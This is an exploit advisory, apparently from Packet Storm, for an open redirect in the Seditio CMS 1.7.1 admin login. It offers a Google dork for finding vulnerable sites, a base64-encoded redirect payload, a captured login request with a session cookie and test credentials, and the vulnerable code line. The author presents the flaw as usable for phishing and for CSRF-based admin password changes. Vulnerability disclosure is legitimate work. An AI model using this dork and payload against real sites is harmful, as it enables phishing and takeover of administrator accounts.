Seditio CMS version 1.7.1 suffers from an open redirect vulnerability.
2ff996b84f5e2517c42761313b4f6b91deae750fa6ae089104e6d04642bfc884[+] Exploit Title: Seditio CMS Open Redirect
[+] Google Dork: intext:"Powered by Seditio CMS"
[+] Date: 27/7/2015
[+] Exploit Author: Arash Khazaei
[+] Vendor Homepage: https://www.seditiocms.com/
[+] Software Link: https://www.seditiocms.com/page.php?id=20&a=dl
[+] Version: 1.7.1(Last Version)
[+] Tested on: Kali , Windows
[+] CVE : N/A
======================================================
[+] introduction:
[+] an open redirect Vulnerability In Admin Login Page Harmed The Cms .
[+] And Can Used For Bypass CSRF For Changing Admin Password , Phishing and
... .
======================================================
[+] Poc:
[+] For Exploiting This Vulnerability We Need encode Our ULR To Base64 .
[+] Our URL : Google = aHR0cDovL2dvb2dsZS5jb20= .
=====================
[+] Defualt Redirect Page Is /admin.php This Mean After Admin Logged In
Will Be Redirected To /admin.php Page .
[+] Default Url :
https://localhost/users.php?m=auth&redirect=L2FkbWluLnBocA==
[+] if we change encoded url with Our Encoded URL Admin After Login Will Be
Ridirected To GOogle.com
[+] Our Url :
https://localhost/users.php?m=auth&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Result :
[+]
https://localhost/sido/users.php?m=auth&a=check&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] POST /sido/users.php?m=auth&a=check&redirect=aHR0cDovL2dvb2dsZS5jb20=
HTTP/1.1
[+] Host: localhost
[+] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101
Firefox/38.0
[+] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[+] Accept-Language: en-US,en;q=0.5
[+] Accept-Encoding: gzip, deflate
[+] Referer:
https://localhost/sido/users.php?m=auth&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Cookie: SEDITIO=MDpfOjA6XzpzcGVjaWFs; KCFINDER_showname=on;
KCFINDER_showsize=on; KCFINDER_showtime=on; KCFINDER_order=type;
KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=on;
timezoneOffset=16200,0;
__utma=111872281.449674650.1437406401.1437406401.1437406401.1;
__utmz=111872281.1437406401.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
PHPSESSID=97amucvohmev2ltkkmhi9jl9e3
[+] Connection: keep-alive
[+] Content-Type: application/x-www-form-urlencoded
[+] Content-Length: 64
[+] rusername=admin&rpassword=admin1&rcookiettl=0&x=97AMUCVOHMEV2LTK
[+] HTTP/1.1 302 Found
[+] Date: Mon, 27 Jul 2015 17:45:08 GMT
[+] Server: Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15
[+] X-Powered-By: PHP/5.5.15
[+] Expires: Thu, 19 Nov 1981 08:52:00 GMT
[+] Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
[+] Pragma: no-cache
[+] Location: message.php?msg=104&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Content-Encoding: gzip
[+] Vary: Accept-Encoding
[+] Content-Length: 20
[+] Keep-Alive: timeout=5, max=100
[+] Connection: Keep-Alive
[+] Content-Type: text/html
[+] You Can See HTTP 302 Found And Redirected . To Google .
Vulnerable Code In /system/core/users/user.auth.php
$t->assign(array(
"USERS_AUTH_TITLE" => $L['aut_logintitle'],
Vulnerable -> "USERS_AUTH_SEND" =>
"users.php?m=auth&a=check&redirect=".$redirect,
Discovered By : Arash Khazaei
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed